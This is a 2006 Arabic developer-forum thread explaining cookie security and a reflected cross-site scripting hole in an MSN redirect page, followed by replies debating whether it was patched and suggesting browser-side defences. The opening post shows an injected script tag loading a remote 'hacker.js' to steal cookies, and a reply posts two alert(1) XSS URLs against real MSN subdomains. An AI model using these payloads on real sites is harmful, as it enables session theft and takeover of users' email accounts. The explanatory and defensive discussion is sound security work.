شوّيت: شبكة كرة قدم اجتماعية




العودة   سوالف سوفت > سوالف برمجة المواقع وتطويرها > الويب والويب 2.0 والـ Semantic Web
التسجيل المدوّنات البحث مشاركات اليوم جعل الأقسام مقروءة

الرد على الموضوع
 
LinkBack أدوات الموضوع
خبير JavaScript
المدخلات في المدونات: 15
#1  
تبادل الخبرات[5]( الكوكيز وثغرة الـ MSN)

السلام عليكم

المدخل

الكوكيز: الحلوة الرقمية
الكوكيز هو ملف نصي له وقت ينتهي، يقوم الخادم بزرعها في جهاز الزبون قصد حفظ بعض المعلومات و المتغيرات لحين استرجاعها او التعامل معها في اتصال آخر

وتتراوح خطورة الكوكيز اذا تم فتح ثغرة للوصول اليها، من ثغرة لاتشكل أي خطر على الخادم و الزبون الى درجة خطيرة جدا قد تعصف بمعلومات الزبون، خصوصا اذا كان الكوكيز يعود لموقع بريد مهم ك msn yahoo gmail

- ثعرة لا تشكل أي خطر
عندما يتم الوصول الى الكوكيز لكن، المعلومات التي تكون مخزنة فيه تكون خاصة بمتغيرات و قيم لها علاقة بالتصميم او معلومات خاصة بالمتصفح، كأن يحفظ في الكوكيز نوع المتصفح او طول وعرض الشاشة اوقيم خاصة بطول او عرض خانة او صندوق او متغيرات خاصة بالجافاسكريبت، او عداد لإظهار نافذة منبثقة مرة كل ثلاث أيام مثلا.
فهنا ان تم الوصول و التحكم في الكوكي فإنه لا يشكل أي خطر على صاحب السيرفر(الخادم) و صاحب الجهاز(الزبون)

- ثغرة متوسطة
هي الثغرة التي ان تم الكشف و الوصول الى الكوكيز يكون المتضرر الوحد هو العميل، كأن يعتمد في الكوكيز على الإحصائيات او تخزين رقم ال IP او بعض المعلومات عن الزبون قصد الإستفادة منها او ليقيم به موقعه، او معلومة يتذكر بها الجهاز ليضع إعلانات غير مكررة مثلا
ان ثم الوصول و التلاعب في الكوكي، فلن يتضرر الزبون بل صاحب الصفحة هو من سيحصل له إختلال في المعلومات، التي يستجديها من جهاز الزبون

- ثغرة عاصفة
هي التي يكون فيها الكوكيز مخزن لبعض المعلومات الحساسة ككلمة المرور و كلمة السر وبعض القيم التي ان تغيرت يتم تغيير في قاعدة بيانات العميل
تكمن الخطورة هنا ان تم الكشف عن ذاك الكوكيز، فإن مكتشف او المتلاعب بالكوكيز هنا ستكون له الأولوية على بريدك او حسابك
والمتضرر هنا بالدرج الأولى هو الزبون الذي ستتعرض مصالحه للخطر

هذه الثغرات كلها غير واردة الا إن كان المبرمج في تعامله مع الكوكيز لم يؤمنها
والتأمين هنا ليس في حماية الكوكيز نفسه او إعلاق الأبواب الخلفية، بل في جعل البرمجة لا تقبل وسوم خارجية او تحكم خارجي في الكوكيز(أي من خارج الموقع، لأن الكوكيز يتعرف على الموقع من الإمتداد الجدري)
حتى أن من خوف بعض مبرمجي ال php من الكوكيز يلتجئ الى الجلسات ثم الجلسات ولا حلوة صغيرة(cookie)

المأزق
الثغرة الأخيرة التي ذكرت والتي ان ثم توضيفها جيدا وكان للموقع رواجا كبيرا و مصالح للناس فيه، خصوصا ان كان بريد إلكتروني فإن بهذه الثغرة قد تعرضت عورات بريدهم للكشف لغيرهم كما حدث ومازال يحدث مع العملاق المتقزم(بسبب هذه الثغرة) ال msn
أساس مشكلة ثغرة الكوكيز في ال msn
سأحاول تقريبها بال php
هذه الصفحة سنلاحظ انه يوجد بها متغير $RE هذا المتغير يأخد القيمة من العنوان
كود PHP:
<br>
Unless your browser has scripting disabledyou should be returned to the 
page you were at in a couple seconds
.  Otherwiseplease click 
<a href="$RE"><b>here</b></a>
to return manually.
</
body></html
أي إن كان العنوان هكذا
www.xxx.msn.com?RE=www.swalif.net
فإن ناتج الصفحة سيكون هو
كود PHP:
<br>
Unless your browser has scripting disabledyou should be returned to the 
page you were at in a couple seconds
.  Otherwiseplease click 
<a href="www.swalif.net"><b>here</b></a>
to return manually.
</
body></html
أين المشكل إذا؟
المشكلة يبدوا ان مبرمج هذه الصفحة حين برمجته لها أكل من كبدة بائتة
حيث جعل اية قيمة يحملها المتغيرRE تطبع في الصفحة دون مرورها من دوال للتحقق من مصداقيتها
ماذا يعني هذا؟
يعني ان المتغير يقبل الوسوم!!
يكفي ان يكون مبرمج ذو بال حتى يقحم بعض الوسوم الحساسة، كأن يغلق وسم الرابط ليفتح وسم استدعاء السكريبت، وان تم له ان يستدعي ملف جافاسكريبت من داخل الوسم من جهازك فإنه بدالة document.coockie يعرف الكوكي كله الخاص بال msn طالما ان الموقع الجدري هو الذي يستدعيى السكريبت الفرعي، وهذا مثال مبسط
ان كان الرابط

كود PHP:
 www.xxx.msn.com?RE=#"></a><script src="http://www.xxx.com/hacker.js"></script><a href=" 
بعد تحويل قيمة RE الى نسب مؤية عن طريق الدالة escap حتى لا يقع تعارض بين الرموز البرمجية و النصوص العادية
فإن الناتج عن هذه الصفحة هي
كود PHP:
<br>
Unless your browser has scripting disabledyou should be returned to the 
page you were at in a couple seconds
.  Otherwiseplease click 
<a href="#"></a><script src="http://www.xxx.com/hacker.js "></script><a href=""><b>here</b></a>
to return manually.
</body></html> 
معناه ان صفحة ال msn إستدعت ملف السكريبت http://www.xxx.com/hacker.js
وهذا الملف الله وحده يعلم مايمكن ان يوضع فيه
وما يمكن ان ينتج عن هذه الثغرة
- الكوكيز ممكن سحبه بسهولة و غرساله عن طريق تقنية أجاكس دون ان تدري
- كما يمكن ان يعدل لك في الكوكيز بما يناسبه
- حقيقة ان أغلب كلمات السر التي تكون محفوظة في الكوكيز تكون مشفرة على وزن MD5 لكن يمكنه ان يلج لحسابك و في حسابك توجد كلمات مرور و أسرار أخرى
- ان يضع لك أكواد ActiveX معلوم انه هناك اوامر لا تتعدى سطرين يمكن ان تعدل في قاعدة الروجيستر الخاصة بجهازك، وان وصل الى الروجستر فبإمكانه ان يجعلك عندما تريد ان تدخل الى hotmail يحولك مباشرة الى موقعه او يستدعي لك صورة او لعبة في صفحة ال msn
(حقيقة تخرج رسالة تحذير انك ستعدل على ملفات النظام، لكن هناك من لا يعرف اصلا ماهو أكتف إكس، اوكي او خلاص)

اين يكمن الخطر

الخطر يكمن في انك لا تعرف الصفحة الملغومة وللأسف فايرفوكس بنفسه تمر عليه الحيلة (لأن الثغرة ليست ثغرة المتصفح) حيث يمكن ان يعطيك أحد رابط عادي لموقع معين او صفحة معينة حين الدخول اليها لا تكاد تعد في نفسك لغاية 3 حتى يكون انسحب من الكوكي ولا من شاف ولا من دري
النقرة الأولى تقوم بتحويلك مباشرة الى الرابط الملغوم
المرة الثانية يتم سحب الكوكي من الضحية و إرساله الهكر
المرة الثالثة من خلال كود اللجافا الذي أحد منك الكوكيز هو نفسه بعد انتهاء العملية يعيدك الى الصفحة التي يريد ان يريها لك
يني ان قال لك اليك موقع اخباري مثلا فإنك ستمر عبر مرحليتن ثم المرحلة الثالثة هي التي تفتح لك موقع الأخبار، كل هذا في أقل من 3 ثواني

المخرج
هو في مراسلة ال msn بهذه الثغرة رغم انها أقرت بها كم مرة ولم ترقعها و لا مرة أو تعليق خدمة ال msn الى أجل مسمى

هناك أخطاء إملائية خصوص نسيان بعض الحروف حيت ان لوحة المفاتيح حاصتي عاصي الدمع

إبراهيم بيدي

تبادل الخبرات[4](إيجابيات وسلبيات أجاكس)
تبادل الخبرات[3](Include(Ajax))
تبادل الخبرات[2](البكسل و النسبة المؤية)
تبادل الخبرات[1].(مالبديل للدالة)for






Zizwar is offline   قديم 08-09-2006, 04:02 PM
الرد مع إقتباس
خبير JavaScript
المدخلات في المدونات: 15
#2  

سرعة البرق في التثبيت شكرا لكم
أكيد ابو مشعل






Zizwar is offline   قديم 08-09-2006, 04:08 PM
الرد مع إقتباس
ينتظر رسالة التوكيد
#3  

ما شاء الله ... موضوع أكثر من رائع

على فكره أنا شاهدة الموضوع مثبت و عدد الزيارت واحد فقط .






I.M.A.S is offline   قديم 08-09-2006, 04:17 PM
الرد مع إقتباس
مشرف
#4  

شكرا لك إستاذي العزيز ..

معلومات قيمة ..

افكر اليوم .. هل ممكن إيجاد برنامج يقرى أي ملف جافا في المتصفح قبل تنفيذ ما بي داخله
هل ممكن وضع جدار ناري على ملف الكويكز ومن اراد ان يسحب من الملف الي بداخله الكويكز
لابد ان نسمح له حتى نتحقق ..

هذي بعض الاشياء الي دارة في ذهني ..

واشكرك على موضوعك وشكرا لمن ثبت الموضوع ..

والله بديت اخاف بكرى القاهم مخترقين جسمي بكرى القاه يناظرون بعيوني ولا يسمعون بذاني






__________________
@jawany
Abdullah Alhoshan is offline   قديم 08-09-2006, 04:20 PM
الرد مع إقتباس
عضو فعال
#5  

بارك الله فيك عزيزي إبراهيم
شكرا لك على هده المعلومات المفيدة
_____________________________
مامشيتي تا درتيها






__________________
اللهم أنت ربي لا إله الا أنت،
خلقتني وأنا عبدك وأنا على عهدك ووعدك ما استطعت،
أعوذ بك من شر ما صنعت،
أبوء لك بنعمتك عليّ وأبوء بذنبي،
فاغفر لي، فإنه لا يغفر الذنوب إلا أنت
Mercedes is offline   قديم 08-09-2006, 04:54 PM
الرد مع إقتباس
عضو نشيط
#6  

جزاك الله خير أخي ..

موضوع قيم ..ويستاهل التثبيت ..

أخوك :- أبو عبدالعزيز العريني ..






ArabsMafia is offline   قديم 08-09-2006, 05:01 PM
الرد مع إقتباس
عضو نشيط
#7  

وعليكم السلام

اول شي ابرك لنفسي على الانضمام الي اسره سوالف سوفت
وان شاء الله اقدر افيد واستفيد

واحب اشكرك اخوي Wino على طرحك الموضوع

والحاجة المقلقة هو سكوت MSN عن الثغره
ونرى كل يوم ايميل يسقط بستخدام الاستثمار

حصلت على برنامج اجنبي وطورته وهو الحل الوحيد في الوقت الحالي
http://saudihacker.net/mailsecurity.htm

طبعا يمكنك التخلص من الكوكاز بطريقة الاعتيادية بس بيكون متعب شوي
والبرنامج ذا مبسط الي ابعد درجة " والحمد الله تم التجربة ونجح في ابطال عمل
الاستثمار "

" يعتبر هذا حل مؤقت "
وتحياتي لك







آخر تعديل بواسطة ماجد العتيبي في 08-09-2006 الساعة 05:12 PM. السبب: اضافة كلمة
ماجد العتيبي is offline   قديم 08-09-2006, 05:10 PM
الرد مع إقتباس
عضو فعال
#8  

مجهود تشكر عليه في الشرح المتكامل أخي إبراهيم .. لكن لا ادري لماذا لا زلت لا اصدق وجود هذه الثغرة في MSN و أعتبرها إشاعة ، هذه الثغرة كانت موجودة قبل 3 سنوات تقريبا و أغلقتها msn في غضون أسبوع ، اما ما يتكلم البعض عنه الآن بوجود هذه الثغرة فأظن انه مجرد اشاعه لأني لم أجد في المواقع المهتمة في مجال أمن المعلومات أي ضجه حول هذا الموضوع ...

تحياتي






البرواز is offline   قديم 08-09-2006, 06:41 PM
الرد مع إقتباس
عضو فعال
#9  

جزاك الله خير الجزاء أخي الموقر زيزوار

إقتباس:
المخرج
هو في مراسلة ال msn بهذه الثغرة
وتمت مراسلة الشركه بهذ الثغره ونتمنى ان يجدوا لها حل بأسرع وقت ممكن ان شاءالله

وإلا لذهبت الهوتميلات للمهملات ههههههههه وفقدنا كل المعلومات لاسمح الله

abuse@hotmail.com
falseaddress001@hotmail.com
sales@hotmail.com

راسلوهم أنتم إيضا والدال على الخير كفاعله

تحيااتي






__________________
سبحان الله وبحمده
سبحان الله العظيم

"جديد" أكبر مركز تحميل عربي
WwW.U111U.CoM
دليل المواقع المرئية الأول عربيا
9mbc.com
هل صليت على النبي !!
اقرب للحقيقه ستهرب من العراق مثل الجرذان
9mbc is offline   قديم 08-09-2006, 08:18 PM
الرد مع إقتباس
خبير JavaScript
المدخلات في المدونات: 15
#10  

عبدالعزيز سعود شكرا على المرور و أيضا تم تثبيت الموضوع بعد دقيقة تقريبا

أخي جواني توجد برامج تفتح الملف دون تطبيقه تقريبا أغلب محررات النصوص تفعل هذا جرب editplus

Mercedes الشكر لك انت على المساعدة

ArabsMafia شكرا لك على المرور

أخي -Saudi- مرحبا بك بيننا وكما قلت كل يوم ايميل يسقط بستخدام الاستثمار، شكرا على البرنامج

البرواز صدقا بدوري لم أصدق الى ان أعطاني الأخ Mercedes رابط ملغوم بناءا على طلب مني وعند تحليله و برمجته، تأكد بما لا يدخل الشك ان الثغرة موجودة وقاتلة، راسلني ان شئت من سوالف(حتى أعرف انك انت) لأعطيك رابط إن دخلت اليه يعرض عليك نافذة بها جميع معلومات الكوكيز الخاصة بال msn
بالإظافة انه سيظيف اليه كلمة winoooo كما في هذا المثال المرفق






الصور المرفقة
نوع الملف: jpg kookie.jpg‏ (46.7 كيلوبايت, 1705 مشاهدة)
Zizwar is offline   قديم 08-09-2006, 08:27 PM
الرد مع إقتباس
خبير JavaScript
المدخلات في المدونات: 15
#11  

بارك الله فيك أخي 9mbc وأحسن حل هو مراسلتهم بهذه الثغرة، تخاف أن تراسلهم فيردون عليك بأنهم لن يصلحون الا حين الإنتها من windows vista






Zizwar is offline   قديم 08-09-2006, 08:29 PM
الرد مع إقتباس
عضو نشيط جدا
#12  

بارك الله فيك أخي Wino

وأسأل الله أن يجعلها في ميزات حسناتك






__________________
مدونتي
عبدالرحمن ساحلي is offline   قديم 08-09-2006, 08:50 PM
الرد مع إقتباس
عضو فعال
#13  

جميل جداً ماشاءالله
أعتقد بأنك قمت بترجمة server خطأً الى عميل والصحيح خادم






aldosari is offline   قديم 08-09-2006, 09:24 PM
الرد مع إقتباس
عضو فعال جدا
#14  

موضوع رائع مشاء الله الف شكر لك اخوي على التفصيل المفيد جدا .






__________________
htaccess بكل بساطة

الشفرة الموحدة "يونِكود"

(إن من مفاسد هذه الحضارة أنها تسمي الاحتيال ذكاءً، والانحلال حرية، و"الرذيلة فناً" والاستغلال معونة) - مصطفى السباعي
jadweb.com is offline   قديم 08-09-2006, 11:49 PM
الرد مع إقتباس
عضو فعال
#15  

والله أنا أشوف الحل لهذه الثغره التي تؤرق الكل في استخدام برامج الـ popup blocker او كما يسميها البعض ads blocker .
فقط أضف الروابط الخطيره على موقع الـ msn والتي عن طريقها تتحقق سرقة الكوكيز
والروابط هي:
http://newsletters.msn.com
http://calendar.msn.com

أنا استخدم متصفح إسمه Maxthon ويوجد به plugin خاص بالـ popup والـ ads وهو يعمل معي على أكمل وجه.

إذا في روابط أخرى ياليت تضيفوها ياشباب






__________________
al3ndaleeb[@]uk2.net
العندليب is offline   قديم 09-09-2006, 12:42 AM
الرد مع إقتباس
عضو سوبر نشيط
#16  

شكراً لك أخي Wino ... لي تعقيب على الموضوع فيما بعد مشغول

وموضوعك أنتهى أتمنى لك التوفيق






Fox Mind is offline   قديم 09-09-2006, 01:02 AM
الرد مع إقتباس
عضو فعال جدا
#17  

وينو يعطيك العافيه موضوع شيق
------
البرواز
http://www.net-force.nl/files/articles/hotmail_xss






yam90 is offline   قديم 09-09-2006, 01:11 AM
الرد مع إقتباس
عضو نشيط
#18  

طيب اهوا فيه طريقة أستخدمها بس هل ( بتعتبرونه حل مؤقت ام لا )
وهو عن طريق المتصفح Internet Explorer
ومن صفحة المتصفح
تختار
Tools >> Internet option >> Privacy >> Advanced

بتظهر نافذه ضع علامة صح على Override automatic cookie hanling

وضع الاختيار Prompt كلا الامرين

وبعدها OK وانتهينا

معليش مأدري إيش ترجمتها بالعربي بالتحديد عشان كذا اعذروني بس شاهدو الصورة بالاسفل ...





طبعاً إلي احنى عملناه هو يظهر لك تنبيه عن دخول اي موقع يطلب فيها الكوكيز والمواقع الموثوقه اعطيها السماح الدائم
ام الروابط المشبوهه التي مثل كذا احطيها حجب دائم من خلال النافذة التي تظهرلك ..


طولت الموضوع وهو قصير

شكرا Wino على فتح الموضوع






__________________
سبحان الله وبحمده & سبحان الله العضيم
ATmax is offline   قديم 09-09-2006, 05:57 AM
الرد مع إقتباس
عضو فعال
#19  

اتضح لي الموضوع الآن

الثغرة إكتشفت في تاريخ 4 يونيو عام 2005 ، و تم حلها في تاريخ 5 يونيو عام 2005 ، اي بعد يوم واحد من اكتشافها ..

أقول يا ربي هوتميل مستحيل تترك ثغرة تنتشر لهذي الدرجة ... كان عندي احساس ان الموضوع مجرد اشاعة


شكرا للجميع ..






البرواز is offline   قديم 09-09-2006, 11:51 AM
الرد مع إقتباس
عضو سوبر نشيط
#20  

السلام عليكم ...


موضوع اكثر من رائـــــع اخي ابراهيم ... احب انبه الأخوان على موضوع مهــــم جداً

هو انه بعض الاخوة يتلقون رسالة فيها رابط مثلاً من شخص مجهول ... ويعتقدون انه المشكلة في الضغط على الرابط فقط .. اي انها من الرسالة .. لكن المشكلة الأساسية من الموقع الي انت تدخله ... وهي انه يحط iframe خفي ويحط الرابط او الهدف للفريم ... يحط رابط الثغرة على الهوت ميل .. واعتقد باقي الرابط الاخوة يعرفونه ...
اخوكم ..

اخوي ابراهيم لي لقاء بك على المسنجر ان شاء الله






__________________
مدونتي | تويتر

almosmm is offline   قديم 09-09-2006, 03:22 PM
الرد مع إقتباس
عضو سوبر نشيط
#21  

مبروك الثغره ترقعت

مشكور اخوي على الموضوع ومالي تعقيب على كلامك
والي يبي الاستزاده في هالموضوع ماظن فيه مكان افضل من قوقل
"cross site scripting" واقرا براحتك

بالنسبه للحمايه الامثل :
احد الاشتراطات الرئيسيه في الثغره انها تشتغل هو يكون السيشن ماانتهت مدته يعني لو مسوي تسجيل خروج من الهوتميل بعد ماشفت الانبوكس بعدين فتحت الوصله ماراح تشتغل تأكد في الخيارات الخاصه بالايميل ان الايميل مخلي فيه مده السيشن لاتزيد عن نصف ساعه من مده الخروج

ثانيا انا من مستخدمي الفايرفوكس وهذا addon اسمه blocksite
https://addons.mozilla.org/firefox/3145/

ضفت له
http://newsletters.msn.com
وخلاص انحلت المسئله

آمل ان اكون افدت البعض بما قلت

هذا ولله اعلم

تحياتي






alwoolf is offline   قديم 09-09-2006, 03:23 PM
الرد مع إقتباس
عضو سوبر نشيط
#22  

اخي alwoolf ... عفواً ولكن الثغرة تقريباً منــــــــــــــــتشرة في جميع ارجاء الـ msn .... لا ادري هل هو مرض منتشر او ماذا :S لإنه موجود في اقسام كثيرة جداً غير الكلندر والأخبار ..

اخوكم .






__________________
مدونتي | تويتر

almosmm is offline   قديم 09-09-2006, 03:25 PM
الرد مع إقتباس
عضو نشيط
#23  

ايضا هنا ثغرة XSS
كود:
http://mobile.arabia.msn.com/en/download.php?f=c_24&a=msn_arabia&type=24&id=4234&son_nom="><Script>alert(1);</script>
كود:
http://msn.careerbuilder.com/Custom/MSN/CareerAdvice/Default.aspx?siteid=CBMSN1009&sc_extcmp=JS_MSN_CarAdvice&cbRecursionCnt="><script>alert(1);</script>
اضيفو الموقع لقائمة blacklist






__________________
المهم فيما تراه هو ما تتطلع إليه

حمل ملفاتك لغاية 5 ميجا مع الاعصار العربي

نستضيف موقعك على سيرفرات قوية و محمية على اعلى المستويات
www.3sar.com
e3sarcom is offline   قديم 09-09-2006, 04:10 PM
الرد مع إقتباس
عضو سوبر نشيط
#24  

السلام عليكم ورحمة الله وبركاته

موضوع جميل لكن ما جاب لنا الحل

إقتباس:
المشاركة الأصلية بواسطة البرواز
اتضح لي الموضوع الآن

الثغرة إكتشفت في تاريخ 4 يونيو عام 2005 ، و تم حلها في تاريخ 5 يونيو عام 2005 ، اي بعد يوم واحد من اكتشافها ..

أقول يا ربي هوتميل مستحيل تترك ثغرة تنتشر لهذي الدرجة ... كان عندي احساس ان الموضوع مجرد اشاعة


شكرا للجميع ..
أخي الفاضل الثغرة قبل اسبوعين ونصف تقريباً تعمل كيف تقول عام 2005 وانا مجربها واعرف احد الاصدقاء أيضا جربها وايضا اسأل الي انسرقت ايميلاتهم يعلمونك

.
..
...
PHP4PRO






php4pro is offline   قديم 10-09-2006, 02:32 PM
الرد مع إقتباس
عضو فعال
#25  

أخي php4pro .. راجع الرابط التالي :

http://www.net-force.nl/files/articles/hotmail_xss


تحياتي






البرواز is offline   قديم 10-09-2006, 09:00 PM
الرد مع إقتباس
الرد على الموضوع


 

أدوات الموضوع

قوانين المشاركات
لا يمكنك كتابة مواضيع جديدة
يمكنك إضافة ردود
لا يمكنك إرسال مرفقات
لا يمكنك تعديل مشاركاتك

كود vB متاح
كود [IMG] متاح
كود HTML غير متاح
Trackbacks are متاح
Pingbacks are متاح
Refbacks are متاح



جميع الأوقات بتوقيت غرينتش +3. الوقت الآن هو 12:51 PM.